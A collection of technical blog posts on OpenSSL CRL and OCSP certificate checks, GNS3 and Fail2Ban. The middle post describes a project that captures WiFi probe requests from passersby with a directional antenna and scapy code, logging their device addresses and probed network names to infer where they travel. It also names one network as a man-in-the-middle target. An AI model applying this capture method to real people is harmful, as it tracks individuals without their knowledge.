cnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUVWUm9vdENBLmNybDAfBgNVHSME
GDAWgBSxPsNpA/i/RwHUmCYaCALvY2QrwzAdBgNVHQ4EFgQUUOpzidsp+xCPnuUB
INTeeZlIg/cwDQYJKoZIhvcNAQEFBQADggEBAB7ipUiebNtTOA/vphoqrOIDQ+2a
vD6OdRvw/S4iWawTwGHi5/rpmc2HCXVUKL9GYNy+USyS8xuRfDEIcOI3ucFbqL2j
CwD7GhX9A61YasXHJJlIR0YxHpLvtF9ONMeQvzHB+LGEhtCcAarfilYGzjrpDq6X
dF3XcZpCdF/ejUN83ulV7WkAywXgemFhM9EZTfkI7qA5xSU1tyvED7Ld8aW3DiTE
JiiNeXf1L/BXunwH1OH8zVowV36GEEfdMR/X/KLCvzB8XSSq6PmuX2p0ws5rs0bY
Ib4p1I5eFdZCSucyb6Sxa1GDWL4/bcf72gMhy2oWGU4K8K2Eyl2Us1p292E=
-----END CERTIFICATE-----

As you can see, this is number 1. Number 0 is the certificate for Wikipedia, we already have that. If your site has more certificates in its chain, you will see more here. Save them all, in the order OpenSSL sends them (as in, first the one which directly issued your server certificate, then the one that issues that certificate and so on, with the root or most-root at the end of the file) to a file, named chain.pem.

You can use the following command to save all the certificates OpenSSL command returns to a file named chain.pem. See [this article for more information)[https://raymii.org/s/articles/OpenSSLGetallcertificatesfromawebsiteinplaintext.html).

OLDIFS=$IFS; IFS=':' certificates=$(openssl s_client -connect wikipedia.org:443 -showcerts -tlsextdebug -tls1 2>&1 </dev/null | sed -n '/-----BEGIN/,/-----END/ {/-----BEGIN/ s/^/:/; p}'); for certificate in ${certificates#:}; do echo $certificate | tee -a chain.pem ; done; IFS=$OLDIFS 

Combining the CRL and the Chain

The Openssl command needs both the certificate chain and the CRL, in PEM format concatenated together for the validation to work. You can omit the CRL, but then the CRL check will not work, it will just validate the certificate against the chain.

cat chain.pem crl.pem > crl_chain.pem

OpenSSL Verify

We now have all the data we need can validate the certificate.

$ openssl verify -crl_check -CAfile crl_chain.pem wikipedia.pem 
wikipedia.pem: OK

Above shows a good certificate status.

Revoked certificate

If you have a revoked certificate, you can also test it the same way as stated above. The response looks like this:

$ openssl verify -crl_check -CAfile crl_chain.pem revoked-test.pem 
revoked-test.pem: OU = Domain Control Validated, OU = PositiveSSL, CN = xs4all.nl
error 23 at 0 depth lookup:certificate revoked

You can test this using the certificate and chain on the Verisign revoked certificate test page: https://test-sspev.verisign.com:2443/test-SSPEV-revoked-verisign.html.

OpenSSL: Manually verify a certificate against an OCSP


This article shows you how to manually verfify a certificate against an OCSP server. OCSP stands for the Online Certificate Status Protocol and is one way to validate a certificate status. It is an alternative to the CRL, certificate revocation list.

Compared to CRL’s:

  • Since an OCSP response contains less information than a typical CRL (certificate revocation list), OCSP can use networks and client resources more efficiently.
  • Using OCSP, clients do not need to parse CRLs themselves, saving client-side complexity. However, this is balanced by the practical need to maintain a cache. In practice, such considerations are of little consequence, since most applications rely on third-party libraries for all X.509 functions.
  • OCSP discloses to the responder that a particular network host used a particular certificate at a particular time. OCSP does not mandate encryption, so other parties may intercept this information.

You can read more about the OCSP on wikipedia

We will be using OpenSSL in this article. I’m using the following version:

$ openssl version
OpenSSL 1.0.1g 7 Apr 2014

Get a certificate with an OCSP

First we will need a certificate from a website. I’ll be using Wikipedia as an example here. We can retreive this with the following openssl command:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p'

Save this output to a file, for example, wikipedia.pem:

openssl s_client -connect wikipedia.org:443 2>&1 < /dev/null | sed -n '/-----BEGIN/,/-----END/p' > wikipedia.pem

Now, check if this certificate has an OCSP URI:

openssl x509 -noout -ocsp_uri -in wikipedia.pem
http://ocsp.digicert.com

If it does not give any output, the certificate has no OCSP URI. You cannot valdiate it against an OCSP.

Getting the certificate chain

It is required to send the certificate chain along with the certificate you want to validate. So, we need to get the certificate chain for our domain, wikipedia.org. Using the -showcerts option with openssl s_client, we can see all the certificates, including the chain:

openssl s_client -connect wikipedia.org:443 -showcerts 2>&1 < /dev/null

Results in a boatload of output, but what we are interested in is the following:

 1 s:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3
   i:/C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance EV Root CA
-----BEGIN CERTIFICATE-----
MIIGWDCCBUCgAwIBAgIQCl8RTQNbF5EX0u/UA4w/OzANBgkqhkiG9w0BAQUFADBs
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j
ZSBFViBSb290IENBMB4XDTA4MDQwMjEyMDAwMFoXDTIyMDQwMzAwMDAwMFowZjEL
MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3
LmRpZ2ljZXJ0LmNvbTElMCMGA1UEAxMcRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug
Q0EtMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAL9hCikQH17+NDdR
CPge+yLtYb4LDXBMUGMmdRW5QYiXtvCgFbsIYOBC6AUpEIc2iihlqO8xB3RtNpcv
KEZmBMcqeSZ6mdWOw21PoF6tvD2Rwll7XjZswFPPAAgyPhBkWBATaccM7pxCUQD5
BUTuJM56H+2MEb0SqPMV9Bx6MWkBG6fmXcCabH4JnudSREoQOiPkm7YDr6ictFuf
1EutkozOtREqqjcYjbTCuNhcBoz4/yO9NV7UfD5+gw6RlgWYw7If48hl66l7XaAs
zPw82W3tzPpLQ4zJ1LilYRyyQLYoEt+5+F/+07LJ7z20Hkt8HEyZNp496+ynaF4d
32duXvsCAwEAAaOCAvowggL2MA4GA1UdDwEB/wQEAwIBhjCCAcYGA1UdIASCAb0w
ggG5MIIBtQYLYIZIAYb9bAEDAAIwggGkMDoGCCsGAQUFBwIBFi5odHRwOi8vd3d3
LmRpZ2ljZXJ0LmNvbS9zc2wtY3BzLXJlcG9zaXRvcnkuaHRtMIIBZAYIKwYBBQUH
AgIwggFWHoIBUgBBAG4AeQAgAHUAcwBlACAAbwBmACAAdABoAGkAcwAgAEMAZQBy
AHQAaQBmAGkAYwBhAHQAZQAgAGMAbwBuAHMAdABpAHQAdQB0AGUAcwAgAGEAYwBj
AGUAcAB0AGEAbgBjAGUAIABvAGYAIAB0AGgAZQAgAEQAaQBnAGkAQwBlAHIAdAAg
AEMAUAAvAEMAUABTACAAYQBuAGQAIAB0AGgAZQAgAFIAZQBsAHkAaQBuAGcAIABQ
AGEAcgB0AHkAIABBAGcAcgBlAGUAbQBlAG4AdAAgAHcAaABpAGMAaAAgAGwAaQBt
AGkAdAAgAGwAaQBhAGIAaQBsAGkAdAB5ACAAYQBuAGQAIABhAHIAZQAgAGkAbgBj
AG8AcgBwAG8AcgBhAHQAZQBkACAAaABlAHIAZQBpAG4AIABiAHkAIAByAGUAZgBl
AHIAZQBuAGMAZQAuMBIGA1UdEwEB/wQIMAYBAf8CAQAwNAYIKwYBBQUHAQEEKDAm
MCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5kaWdpY2VydC5jb20wgY8GA1UdHwSB
hzCBhDBAoD6gPIY6aHR0cDovL2NybDMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0SGln
aEFzc3VyYW5jZUVWUm9vdENBLmNybDBAoD6gPIY6aHR0cDovL2NybDQuZGlnaWNl
cnQuY29tL0RpZ2lDZXJ0SGlnaEFzc3VyYW5jZUVWUm9vdENBLmNybDAfBgNVHSME
GDAWgBSxPsNpA/i/RwHUmCYaCALvY2QrwzAdBgNVHQ4EFgQUUOpzidsp+xCPnuUB
INTeeZlIg/cwDQYJKoZIhvcNAQEFBQADggEBAB7ipUiebNtTOA/vphoqrOIDQ+2a
vD6OdRvw/S4iWawTwGHi5/rpmc2HCXVUKL9GYNy+USyS8xuRfDEIcOI3ucFbqL2j
CwD7GhX9A61YasXHJJlIR0YxHpLvtF9ONMeQvzHB+LGEhtCcAarfilYGzjrpDq6X
dF3XcZpCdF/ejUN83ulV7WkAywXgemFhM9EZTfkI7qA5xSU1tyvED7Ld8aW3DiTE
JiiNeXf1L/BXunwH1OH8zVowV36GEEfdMR/X/KLCvzB8XSSq6PmuX2p0ws5rs0bY
Ib4p1I5eFdZCSucyb6Sxa1GDWL4/bcf72gMhy2oWGU4K8K2Eyl2Us1p292E=
-----END CERTIFICATE-----

As you can see, this is number 1. Number 0 is the certificate for Wikipedia, we already have that. If your site has more certificates in its chain, you will see more here. Save them all, in the order OpenSSL sends them (as in, first the one which directly issued your server certificate, then the one that issues that certificate and so on, with the root or most-root at the end of the file) to a file, named chain.pem.

Sending the OCSP request

We now have all the data we need to do an OCSP request. Using the following Openssl command we can send an OCSP request and only get the text output:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -text -url http://ocsp.digicert.com

Results in:

OCSP Request Data:
    Version: 1 (0x0)
    Requestor List:
        Certificate ID:
          Hash Algorithm: sha1
          Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
          Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
          Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Request Extensions:
        OCSP Nonce:
            0410DA634F2ADC31DC48AE89BE64E8252D12
OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: 50EA7389DB29FB108F9EE50120D4DE79994883F7
    Produced At: Apr  9 08:45:00 2014 GMT
    Responses:
    Certificate ID:
      Hash Algorithm: sha1
      Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
      Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
      Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Cert Status: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

    Signature Algorithm: sha1WithRSAEncryption
         56:21:4c:dc:84:21:f7:a8:ac:a7:b9:bc:10:19:f8:19:f1:34:
         c1:63:ca:14:7f:8f:5a:85:2a:cc:02:b0:f8:b5:05:4a:0f:28:
         50:2a:4a:4d:04:01:b5:05:ef:a5:88:41:d8:9d:38:00:7d:76:
         1a:aa:ff:21:50:68:90:d2:0c:93:85:49:e7:8e:f1:58:08:77:
         a0:4e:e2:22:98:01:b7:e3:27:75:11:f5:b7:8f:e0:75:7d:19:
         9b:74:cf:05:dc:ae:1c:36:09:95:b6:08:bc:e7:3f:ea:a2:e3:
         ae:d7:8f:c0:9d:8e:c2:37:67:c7:5b:d8:b0:67:23:f1:51:53:
         26:c2:96:b0:1a:df:4e:fb:4e:e3:da:a3:98:26:59:a8:d7:17:
         69:87:a3:68:47:08:92:d0:37:04:6b:49:9a:96:9d:9c:b1:e8:
         cb:dc:68:7b:4a:4d:cb:08:f7:92:67:41:99:b6:54:56:80:0c:
         18:a7:24:53:ac:c6:da:1f:4d:f4:3c:7d:68:44:1d:a4:df:1d:
         48:07:85:52:86:59:46:d1:35:45:1a:c7:6b:6b:92:de:24:ae:
         c0:97:66:54:29:7a:c6:86:a6:da:9f:06:24:dc:ac:80:66:95:
         e0:eb:49:fd:fb:d4:81:6a:2b:81:41:57:24:78:3b:e0:66:70:
         d4:2e:52:92
wikipedia.pem: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

If you want to have a more summarized output, leave out the -text option. I most of the time include it to find out problems with an OCSP.

This is how a good certificate status looks:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://ocsp.digicert.com
wikipedia.pem: good
    This Update: Apr  9 08:45:00 2014 GMT
    Next Update: Apr 16 09:00:00 2014 GMT

Revoked certificate

If you have a revoked certificate, you can also test it the same way as stated above. The response looks like this:

Response verify OK
test-revoked.pem: revoked
    This Update: Apr  9 03:02:45 2014 GMT
    Next Update: Apr 10 03:02:45 2014 GMT
    Revocation Time: Mar 25 15:45:55 2014 GMT

You can test this using the certificate and chain on the Verisign revoked certificate test page: https://test-sspev.verisign.com:2443/test-SSPEV-revoked-verisign.html

Other errors

If we send this request to another OCSP, one who did not issued this certificate, we should receive an unauthorized error:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://rapidssl-ocsp.geotrust.com
Responder Error: unauthorized (6)

The -text option here shows more information:

OCSP Request Data:
    Version: 1 (0x0)
    Requestor List:
        Certificate ID:
          Hash Algorithm: sha1
          Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
          Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
          Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Request Extensions:
        OCSP Nonce:
            041015BB718C43C46C41122E841DB2282ECE
Responder Error: unauthorized (6)

Some OCSP’s are configured differently and give out this error:

openssl ocsp -issuer chain.pem -cert wikipedia.pem -url http://ocsp.digidentity.eu/L4/services/ocsp
Response Verify Failure
140735308649312:error:2706B06F:OCSP routines:OCSP_CHECK_IDS:response contains no revocation data:ocsp_vfy.c:269:
140735308649312:error:2706B06F:OCSP routines:OCSP_CHECK_IDS:response contains no revocation data:ocsp_vfy.c:269:
wikipedia.pem: ERROR: No Status found.

If we do include the -text option here we can see that a response is sent, however, that it has no data in it:

OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: C = NL, O = Digidentity B.V., CN = Digidentity OCSP
    Produced At: Apr  9 12:02:00 2014 GMT
    Responses:
    Response Extensions:
OCSP Nonce:
    0410EB540472EA2D8246E88F3317B014BEEF
Signature Algorithm: sha256WithRSAEncryption

Other OCSP’s give out the “unknown” status:

openssl ocsp -issuer chain.pem -cert wikipedia.pem  -url http://ocsp.quovadisglobal.com/
Response Verify Failure
140735308649312:error:27069070:OCSP routines:OCSP_basic_verify:root ca not trusted:ocsp_vfy.c:152:
wikipedia.pem: unknown
    This Update: Apr  9 12:09:18 2014 GMT

The -text options shows us more:

OCSP Response Data:
    OCSP Response Status: successful (0x0)
    Response Type: Basic OCSP Response
    Version: 1 (0x0)
    Responder Id: C = CH, O = QuoVadis Limited, OU = OCSP Responder, CN = QuoVadis OCSP Authority Signature
    Produced At: Apr  9 12:09:10 2014 GMT
    Responses:
    Certificate ID:
      Hash Algorithm: sha1
      Issuer Name Hash: ED48ADDDCB7B00E20E842AA9B409F1AC3034CF96
      Issuer Key Hash: 50EA7389DB29FB108F9EE50120D4DE79994883F7
      Serial Number: 0114195F66FAFF8FD66E12496E516F4F
    Cert Status: unknown
    This Update: Apr  9 12:09:10 2014 GMT

    Response Extensions:

Sources

Sniffing out probes


WiFi capability comes included on just about every device you can imagine. You can even purchase SD cards that are WiFi capable. Most people carry their phones with them wherever they go. Even if you never use the WiFi in your phone, it is probably giving up your location continously. It is also probably identifying you uniquely. In almost any computer network, computers use unique numbers to refer to one another. A WiFi capable device has a media access control address, or MAC, assigned to it long before you purchased it. This address is six bytes long, so there are exactly 281,474,976,710,656 unique addresses available. Any time your device uses a WiFi network, it must send this six byte address to uniquely identify itself.

The process of joining a WiFi network is a straightforward task. First, the device joining can listen for other devices to identify themselves. These identifiers are broadcast continously and are known as beacons. Beacons are broadcast by devices that act as an access point. Included in the beacon is a Service Set Identifier or SSID. This is the name of the access point. If you are ever in a busy area and goto your phone or laptop’s listing of nearby networks you’ve noticed it lists a large number of networks. In such an environment, your device is being constantly inundated with beacons from many networks. If your device receives a beacon from a network it wants to associate with, it can begin the process of joining the network.

The second possibility is that your phone can send out probes. In the case of probes your phone has the option of simply asking “Is anyone out there?” This is known as a broadcast probe. In that case any access point may reply. The other method is your phone has the option of asking “Is Bob there?” In this case your phone must broadcast not only its unique six byte address but the SSID of the access point it wants to connect to. Many WiFi capable devices will continually transmit such probes if outside of range of a known network.

Looking at all this together, we can see that the WiFi signal of your phone can not only unique identify you but also identify places you have been. After all, if your phone is probing for a network named “Starbucks” you were either there or free loading the WiFi from the parking lot.

Putting this knowledge to work

I live along a busy roadway, so I am in a unique position to capture WiFi traffic. There is also a decent amount of pedestrian traffic in the area.

Hardware

In order to capture as many signals as possible, I set up a high gain antenna pointing at the roadway. It is important to emphasize that the antenna should point down the roadway as much as possible. It is very helpful to think of a directional antenna like a flashlight. If you are standing on the side of the roadway, you can point the flashlight directly at it illuminating a single spot. But if you are very close to the edge of the roadway, you can point almost parallel to it. This illuminates more surface area. In this way, the antenna has as many vehicles in view as possible for as long as possible.

Parabolic antenna for 2.4 ghz

This antenna cost me less than $20 shipped off eBay.

In order to capture WiFi traffic I needed a device that could be hooked to this antenna. This device also needs to support monitor mode. Monitor mode is a way of saying the device can capture all available traffic. I happen to have modified a laptop for such purposes years ago.

Modified laptop

The laptop’s screen is broken, but everything else works fine. I don’t have any pictures of how I performed this mod. It is an IBM R51 laptop. Underneath the keyboard is a micro PCI slot. After removing the original wireless card, I installed an Atheros chipset wireless card. If you intend to buy a wireless card for the purpose of monitoring, I highly reccomend Atheros. They are certainly not scientific quality measurement equipment, but most of their products are cheap and are capable of monitor mode. Instead of connecting the card to the internal antennas, I connected it to a coaxial pigtail. The connectors on the WiFi cards themselves are almost alwaysMMCX. On the other end of this coaxial pigtail is a Reverse-Polarity TNC connector. This is brought out the outside of the laptop case. From there, I can adapt to a type N connector used by the high gain antenna.

Software

For an operating system, I have Ubuntu Server Linux installed on the laptop. You’ll need to compile the aircrack-ng suite. Theairmon-ng utility included in it is the easiest way of putting the WiFi card into monitor mode.

With the wireless card in monitor mode, you can now capture packets from it. Initially I tried doing this with Python’s socket module but I found it much easier to do using scapy. Getting scapy to grab packets for your is relatively easy.

import scapy
from scapy.all import sniff

def dummyHandler(packet):
    return

sniff(iface='wlan0',prn=dummyHandler,store=0)

The sniff function runs forever capturing packets from the wlan0 interface. For each packet it calls dummyHandler once with the packet as the argument. Notice the store argument is set to zero. If this is not done, scapy stores all packets in memory indefinitely. This quickly exhausts the available memory on the system.

Frame format

In order to actually make sense of the packet, it is mandatory to understand the WiFi frame format. A great quick reference to that is available here. The basic breakdown of the header is shown here.

  • 2 bytes – Frame control
  • 2 bytes – Duration
  • 6 bytes – Address 1
  • 6 bytes – Address 2
  • 6 bytes – Address 3
  • 2 bytes – Sequence

The frame control consists of a 16 bit integer with many independent bitfields. Normally, any data transmitted over a network is sent in big-endian order. That is to say, the most significant bytes come first. For whatever reason, the IEEE 802.11 standard which defines this format actually specifies that data is sent in a little endian format. The standard is not publicly available to my knowledge, but thisthis StackOverflow post does an excellent job of explaining things. The scapy module extracts the only two values from the Frame Control bitfield that we care about: packet type and subtype. The argument to the handler function has the type and subtypeattributes set on it. The only type that is of interest here is Management packets, which have a type value of zero.

The payload of the packet is available from scapy as the payload attribute of the argument. It also contains the complete header frame. To extract the additional values, the struct module is useful. In the context of the previous example

def handler(packet):
    payload = buffer(str(pkt.payload))
    HEADER_FMT = "<HH6s6s6sH"
    headerSize = struct.calcsize(HEADER_FMT)
    header = payload[:headerSize]
    frameControl,dur,addr1,addr2,addr3,seq = struct.unpack(HEADER_FMT,header)

    TO_DS_BIT = 2**9
    FROM_DS_BIT = 2**10
    fromDs = (FROM_DS_BIT & frameControl) != 0
    toDs = (TO_DS_BIT & frameControl) != 0

    if fromDs and not toDs:
        srcAddr = addr3
    elif not  fromDs and not toDs:
        srcAddr = addr2
    elif not fromDs and toDs:
        srcAddr = addr2
    elif fromDs and toDs:
        return    

The payload attribute is first converted to a string and then passed to the buffer constructor. Using a buffer allows the creation of read-only slices of the original data source without the interpreter having to do the additional work of a deep copy. The structmodule uses a format string to specify the byte structure of data. It expects the input data to have exactly the length required by the format string. So it is neccessary to create a slice of payload before passing it to struct.unpack. For more information on thestruct module format string consult do help(struct) in the interactive Python interpreter.

The addresses are assigned to addr1,addr2,addr3 because the position of the source address changes based on the value of two bits in the Frame Control bitfield. For the specification of this check the quick reference card.

Probes

Probes are management packets with a subtype of four. In the payload of the packet are tagged parameters. The format of the tags is very simple

  • 1 byte – Tag ID
  • 1 byte – Tag Length N
  • N bytes – Content of tag

The only tag that that I am extracting is the SSID tag. It has an ID of zero and a length of 0 to 32. If the length is zero, the probe is a broadcast probe. If the length is non-zero, it is an ASCII string specifying the SSID of the network being probed for.

In order to find the SSID tag, it is required to parse and discard any tag which may precede it. Since the ID and length are just a single byte, concerns about endianness do not apply. It is sufficient to extract each tag, check if the ID is zero, and if not just advance the reference into the payload by the length of the tagged parameter.

Storing gathered data

I ended up creating a simple schema for PostgreSQL to store the observed data. I also added the restriction that if a probe is received from a device in the past five minutes for the same SSID, then it is not added to the database. This prevents devices that are persisently in the area from simply filling the database.

To insert the observations into the database, I used the psycopg2 module. Nothing exciting there.

GitHub

At this point I’m going to dispense with examples and link the current project on GitHub.

Running it

To run the script you’ll need to do some preparation. Start up a PostgreSQL database if you don’t already have one. Create a database for this and create all the needed tables using the probecap.sql file. In my case I am running the database on a seperate machine. As a result, it is very important to have both machines using NTP so the clocks are synchronized.

Next, get your wireless device into monitor mode by using airmon-ng. It can vary from one piece of hardware to the next, but typically all you have to do is a airmon-ng wlan0 stop then airmon-ng wlan0 start. This has to be run as root. Pay very close the output of the second command, as it tells you the name of the interface the device is listening on in monitor mode. In my case it ismon0.

You also must be root to run the Python script.

python probecap.py mon0 conf.json

The first argument is the name of the interface, the second is a JSON file containing a single dictionary. This dictionary is the arguments passed to psycopg2.connect. Update the provided conf.json.example to have the details of your PostgreSQL database.

What’s next?

Now that I’m gathering data all the time, I’ve got some ideas. First off, I’d expect the number of probes to increase and decrease directly with traffic patterns. Additionally, I should be able observe the same device in regular daily patterns as people commute to and from work.

Flawed data capture

Whenever I wrote the code to gather probes, I made the assumption that most stations would be sending out directed probes (for a specific SSID) rather than undirected probes (for any SSID). I did not originally record undirected probes. When I started looking at the data, it was obvious that I was discarding a large amount of potentially interesting data. I had observed 9450 unique stations, but only 1947 of those sent directed probes. By discarding the undirected probes, I was only recording probes from 20% of the stations that I otherwise could be.

As a result, I’ve modified the capture script to record undirected probes from stations. I’m now recording that into a separate database from the original database.

I opted to go ahead and do some analysis now on the existing data set. All of the graphs and data presented here are gathered from the original data set.

The original idea

When I started this I thought that I would be able to analyze the data and notice patterns in the observations of certain stations. So far I have not been able to do this. The reason is only a percentage of stations are observed sending probes more than once.

Fraction of stations sighted more than once

As this chart shows, less than half of stations are observed more than once. If you are looking for patterns in a specific stations activity, this means that less than half of the dataset is of interest.

Analysis

Overall I observed 32022 probes from 1947 unique stations.

Background subtraction

The same probe is recorded only once in a five-minute period. As a result the recored number of probes for some stations is much lower than the real world number of probes. This means that a station probing for some SSID can be recorded no more than 288 times in a day. This is necessary because in any area there are some number of stations that are always there. Most of those stations are associated with an access point and are not actively sending probes, so the capture script does not record them. However, some fraction of them are not associated and may be constantly probing. Common sources of such probes are things like WiFi capable printers which have never been set up. The five-minute period limit stops those stations from simply flooding the database with records and quickly filling it up. Since I am interested in observing the probes only from the traffic in front of my house, these stations are deemed background noise. I don’t intend to count them in the analyzed data.

The upside to using this five minute period is that any station persisently observed should have an inter-observation period average of five minutes. The inter-observation period is the time between which a station is observed probing for the same SSID. This period should be a normal distribution centered around an average value of five minutes.

The distribution of the inter-observation period for a non-background station is unknown at this point in time. However, even if it is also a normal distribution it should not be centered around five minutes.

For each combination of station and SSID I calculated the inter-observation periods. Furthermore, any station that did not have at least 144 independent observation events (one hours worth) I decided it could not be a background station. Then, I calculated the 95% confidence interval for the inter-observation period. If the value five minutes lies within this interval, I conclude that the station is a background station. That station is excluded from the final results.

There is a good chance that this analysis make somes statistical assumption that is untrue. However, starting from the idea that a background station should always be observed and that a station in a vehicle is observed infrequently then it can be concluded that background stations should make up a disproportionate amount of the observed probes. The statistical method I presented identifies stations in agreement with this idea. I identified 12 stations which were reponsible for 50.95% of the observed probes.

Probes by day of the week

The first thing I decided to look at was the number of probes per day of the week.

Probes per day of the week

This graph is not particularly interesting. There are more probes recorded on Friday than any other day of the week. This lines up with the idea that more people are out doing things on a Friday than any other day of the week.

Probes by hour of day

Looking at the number of probes per hour of the day is much more interesting. This is a histogram where the bin width is an hour. I chose to normalize the height of each tally by the number of days included in it. This enables the absolute height of each tally to be compared across all three graphs, even though each one does not include the same number of days.

Probes per hour of day

Probes per hour of weekday

Probes per hour of weekend

The second graph showing the probes per hour of the weekday is the most striking. It lines up with the idea that traffic peaks in the morning when people are travelling to work and in the afternoon when they are coming home. There is a school bus stop near my house. I’m guessing most school students also carry a cell phone, which might explain the afternoon values beginning to rise earlier than expected.

The graph for the weekend shows a strong difference between the weekday graph with activity peaking in the middle of the day.

Stations Per SSID

The next thing I thought would be interesting would be to see how many SSIDs are shared in common by the stations observed. The first question is how many SSIDs have more than one station probing for them.

SSIDs Probed By One Station

Only 12% of the SSIDs observed had more than one station probing for them. I needed to cut down that part of the dataset even more, so I graphed just the upper quartile.

upper Quartile of SSIDs By Station Count

Each SSID is shown along with the number of stations probing for it. Most of these do not stand out very much. “Bright House Networks” is the name of a regional cable provider. “Wayport_Access” is a provider of internet access at McDonald’s.

But what exactly is “Nintendo_3DS_continous_scan_000”? It turns out to be something called StreetPass for the Nintendo 3DS. It is used by the handheld to connect to other handhelds. A good explanation of the WiFi component is found here. The handheld uses these probes as a way to announce its presence and set up what amounts to an ad hoc network. The fact that I saw 353 Nintendo 3DS handhelds is surprising to me.

I have not yet figured out what an SSID of “DIRECT-” corresponds to.

The SSID “attwifi” apparently is used by AT&T to offer wireless service to its customers in public places. Interestingly, it seems that some iPhones attempt to connect to this network even if the user does not instruct them to. This phenomenon is detailed here andhere. This makes a great target for a man in the middle attack on iOS devices.

The SSIDs “linksys” and “NETGEAR” are the defaults on many home access points.

Where to go from here

At the moment, I’m sitting on this project. I believe that capturing the undirected probes will give me a much more interesting dataset.

While I was working on ideas for the background subtraction, it dawned on me that you could use the observations to measure wait time in a queue. If I had clear view of a traffic light, this would be a really neat application. Unfortunately I do not at this time.

The first 3 digits of each stations MAC address are assigned by the IEEE to specific manufacturers. Due to this, I essentially have access to a popularity map of device manufacturers. I am not sure what I will do with this at this time, but I think there are some interesting possibilities.

Source code

I have updated the project on GitHub with the latest source code. I used the matplotlib python module to generate the graphs.

I show my first analysis of captured WiFi probes. Since then I have collected more data. Most importantly, the capture script now collects all probes instead of just directed probes. The data analysis is mostly unchanged. The background subtraction has been further tuned. The stations per SSID chart now simply shows the top 10 most popular SSIDs rather than the upper quartile.

The biggest change this dataset shows from the last is the probes per hour of weekday. There are strong peaks correlating with 8 AM and 5 PM. This agrees with my hypothesis that WiFi activity correlates with traffic patterns.

Graphs

Fraction of stations sighted more than once

Probes per day of the week

Probes per hour of day

Probes per hour of weekday

Probes per hour of weekend

SSIDs Probed By One Station

Top 10 SSIDs By Station Count

Each SSID is shown along with the number of stations probing for it.

Source code

I have updated the project on GitHub with the latest source code. I used the matplotlib python module to generate the graphs.

GNS3 – an open source software that simulate complex networks while being as close as possible


GNS3

GNS3 is an open source software that simulate complex networks while being as close as possible from the way real networks perform, all of this without having dedicated network hardware such as routers and switches.

What is GNS3 ?

GNS3 is an open source software that simulate complex networks while being as close as possible from the way real networks perform, all of this without having dedicated network hardware such as routers and switches.

The software provides an intuitive graphical user interface to design and configure virtual networks, it runs on traditional PC hardware and may be used on multiple operating systems, including Windows, Linux, and MacOS X.

In order to provide complete and accurate simulations, GNS3 actually uses the following emulators to run the very same operating systems as in real networks:

  • Dynamips, the well known Cisco IOS emulator.
  • VirtualBox, runs desktop and server operating systems as well as Juniper JunOS.
  • Qemu, a generic open source machine emulator, it runs Cisco ASA, PIX and IPS.

gns3 documentation

Who can use it?

GNS3 is an excellent alternative or complementary tool to real labs for network engineers, administrators and people studying for certifications such as Cisco CCNA, CCNP and CCIE as well as Juniper JNCIA, JNCIS and JNCIE. Open source networking is supported too!gns3

It can also be used to experiment features or to check configurations that need to be deployed later on real devices.

Finally, program includes exciting features, for instance connection of your virtual network to real ones or packet captures using Wireshark. Finally, thanks to the VirtualBox support, even system administrators and engineers can take advantage of GNS3 to make labs, test network features and study for Redhat (RHCE, RHCT) and Microsoft (MSCE, MSCA) certifications to name a few.

More information can be found at: http://www.gns3.net/download/ and at: https://community.gns3.com/community/support/documentation/

Setup and Configure Fail2Ban on Linux


Fail2Ban

An intrusion prevention framework written in the Python programming language. It is very successful in reducing  dictionary attacks. Because we limit the number of tries to access to the specific service that we want to enable. In this example we are going to show with sshd service only. The standard configuration ships with filters for sshd, Apache, Lighttpd, vsftpd, qmail, Postfix and Courier Mail Server.

Log-in as root user and enter the following command to begin install.

apt-get install fail2ban

Configurations

Copy a config file in /etc/fail 2ban/ of file “jail.conf” to “jail.local”

cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Edit file jail.local

vi /etc/fail 2ban/jail.local

With content,

# "ignoreip" can be an IP address, a CIDR mask or a DNS host
 ignoreip = 127.0.0.1/8
 bantime = 3600
 maxretry = 3

Email Notifications

Find the line that says destmail and add your email address.

destemail = ken.vannakk@gmail.com

Chose default actions

Find line,

action = %(action_)s

And change it to:

action = %(action_mw)s

Email Actions, In this case we use sendmail.

 # email action. Since 0.8.1 upstream uses sendmail
 # MTA for the mailing. Change mta configuration parameter to mail
 # if you want to revert to conventional 'mail'.
 mta = sendmail

Enable SSH

Find the ssh section in the same file, and adjust to your need:

[ssh]
 enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

Once done, restart to apply these settings.

service fail2ban restart

